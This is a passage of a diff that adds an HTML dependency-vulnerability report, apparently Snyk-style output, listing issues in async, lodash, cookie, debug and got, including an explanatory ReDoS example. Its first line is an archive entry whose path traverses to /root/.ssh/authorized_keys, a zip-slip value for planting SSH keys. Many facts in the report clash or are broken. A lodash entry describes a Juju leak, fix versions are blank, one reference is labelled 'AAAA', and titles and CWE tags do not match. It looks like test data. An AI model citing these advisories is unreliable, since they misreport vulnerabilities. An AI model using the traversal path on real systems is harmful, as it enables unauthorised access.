+2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+</code></pre><h2>Remediation</h2><p>Upgrade <code>async</code> to version  or higher.</p><h2>References</h2><ul><li><a href="https://github.com/caolan/async/blob/v3.2.5/lib/autoInject.js#L41" target="_blank" rel="noopener noreferrer">Vulnerable Code</a></li><li><a href="https://github.com/caolan/async/blob/v3.2.5/lib/autoInject.js#L6" target="_blank" rel="noopener noreferrer">Vulnerable Code</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-ASYNC-12239908" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-LODASH-12239302</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> lodash@4.17.21</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; lodash@4.17.21</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 10 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nuget-plugin@2.12.0 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; @yarnpkg/core@4.4.1 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-poetry-lockfile-parser@1.9.0 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-python-plugin@3.1.2 &#x203A; snyk-poetry-lockfile-parser@1.9.0 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nuget-plugin@2.12.0 &#x203A; dotnet-deps-parser@6.1.0 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; @yarnpkg/core@4.4.1 &#x203A; lodash@4.17.21</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-nodejs-lockfile-parser@1.58.19 &#x203A; @yarnpkg/core@2.4.0 &#x203A; lodash@4.17.21</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/lodash" target="_blank" rel="noopener noreferrer">lodash</a> is a modern JavaScript utility library delivering modularity, performance, &amp; extras.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). An issue was discovered in Juju that resulted in the leak of the sensitive context ID, which allows a local unprivileged attacker to access other sensitive data or relation accessible to the local charm.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>lodash</code> to version  or higher.</p><h2>References</h2><ul><li><a href="https://www.cve.org/CVERecord?id=CVE-2024-6984" target="_blank" rel="noopener noreferrer">AAAA</a></li><li><a href="https://github.com/juju/juju/security/advisories/GHSA-6vjm-54vp-mxhx" target="_blank" rel="noopener noreferrer">GitHub Advisory</a></li><li><a href="https://github.com/juju/juju/commit/da929676853092a29ddf8d589468cf85ba3efaf2" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-LODASH-12239302" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Arbitrary Code Injection</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-COOKIE-13271683</li>
+      <li class="card-meta-item">CWE-74</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> cookie@0.4.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @sentry/node@7.34.0 &#x203A; cookie@0.4.2</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Arbitrary Code Injection cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.</p><h2>Remediation</h2><p>Upgrade <code>cookie</code> to version 1.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x" target="_blank" rel="noopener noreferrer">GitHub Advisory</a></li><li><a href="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/jshttp/cookie/pull/167" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-COOKIE-13271683" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-DEBUG-13283909</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> debug@4.3.4</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; debug@4.3.4</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 40 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/snyk-hex-plugin@2.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-cpp-plugin@2.24.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-go-plugin@1.23.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-gradle-plugin@5.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-module@3.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-mvn-plugin@4.3.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nuget-plugin@2.12.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-sbt-plugin@3.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @sentry/node@7.34.0 &#x203A; https-proxy-agent@5.0.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-pipenv-pipfile@0.7.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-poetry@0.9.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; docker-modem@3.0.8 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-poetry-lockfile-parser@1.9.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-python-plugin@3.1.2 &#x203A; snyk-poetry-lockfile-parser@1.9.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-module@3.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-try-require@2.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; snyk-try-require@2.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; snyk-module@3.3.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @sentry/node@7.34.0 &#x203A; https-proxy-agent@5.0.1 &#x203A; agent-base@6.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-pipenv-pipfile@0.7.1 &#x203A; @snyk/child-process@0.4.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-poetry@0.9.1 &#x203A; @snyk/child-process@0.4.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-nodejs-lockfile-parser@1.58.19 &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; snyk-module@3.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-module@3.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-try-require@2.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; @snyk/rpm-parser@3.4.0 &#x203A; debug@4.4.1</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; debug@4.4.3</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/visionmedia/debug" target="_blank" rel="noopener noreferrer">debug</a> is a small debugging utility.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) test</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>A fix was pushed into the <code>master</code> branch but not yet published.</p><h2>References</h2><ul><li><a href="https://github.com/debug-js/debug/issues/957#issuecomment-2523030187" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-DEBUG-13283909" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Alternate solution to CWE-1333 | Inefficient Regular Expression Complexity</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-DEBUG-14214893</li>
+      <li class="card-meta-item">CWE-109</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> debug@4.3.4</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; debug@4.3.4</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 40 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/snyk-hex-plugin@2.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-cpp-plugin@2.24.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-go-plugin@1.23.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-gradle-plugin@5.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-module@3.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-mvn-plugin@4.3.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nuget-plugin@2.12.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-sbt-plugin@3.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @sentry/node@7.34.0 &#x203A; https-proxy-agent@5.0.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-pipenv-pipfile@0.7.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-poetry@0.9.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; docker-modem@3.0.8 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-poetry-lockfile-parser@1.9.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-python-plugin@3.1.2 &#x203A; snyk-poetry-lockfile-parser@1.9.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-module@3.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-try-require@2.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; snyk-try-require@2.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-policy@4.1.6 &#x203A; snyk-module@3.3.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @sentry/node@7.34.0 &#x203A; https-proxy-agent@5.0.1 &#x203A; agent-base@6.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-pipenv-pipfile@0.7.1 &#x203A; @snyk/child-process@0.4.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/fix@1.0.0-monorepo &#x203A; @snyk/fix-poetry@0.9.1 &#x203A; @snyk/child-process@0.4.1 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-nodejs-lockfile-parser@1.58.19 &#x203A; snyk-config@5.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; snyk-module@3.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-module@3.2.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-resolve-deps@4.9.1 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-resolve@1.1.0 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-resolve-deps@4.8.0 &#x203A; snyk-try-require@2.0.2 &#x203A; debug@4.3.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; @snyk/rpm-parser@3.4.0 &#x203A; debug@4.4.1</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; debug@4.4.3</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/visionmedia/debug" target="_blank" rel="noopener noreferrer">debug</a> is a small debugging utility.</p><p>Affected versions of this package are vulnerable to Alternate solution to CWE-1333 | Inefficient Regular Expression Complexity. None</p><h2>Remediation</h2><p>There is no fixed version for <code>debug</code>.</p><h2>References</h2><ul><li><a href="https://github.com/debug-js/debug/issues/957" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-DEBUG-14214893" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Open Redirect</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-GOT-2932019</li>
+      <li class="card-meta-item">CWE-601</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> got@11.8.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; @yarnpkg/core@4.4.1 &#x203A; got@11.8.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 2 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; @yarnpkg/core@4.4.1 &#x203A; got@11.8.2</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-nodejs-lockfile-parser@1.58.19 &#x203A; @yarnpkg/core@2.4.0 &#x203A; got@11.8.2</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs. It allowed a victim to be redirected to a UNIX socket.</p><h2>Remediation</h2><p>Upgrade <code>got</code> to version 11.8.5, 12.1.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/sindresorhus/got/compare/v12.0.3...v12.1.0" target="_blank" rel="noopener noreferrer">GitHub Diff</a></li><li><a href="https://github.com/sindresorhus/got/pull/2047" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-GOT-2932019" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-MARKED-2342073</li>
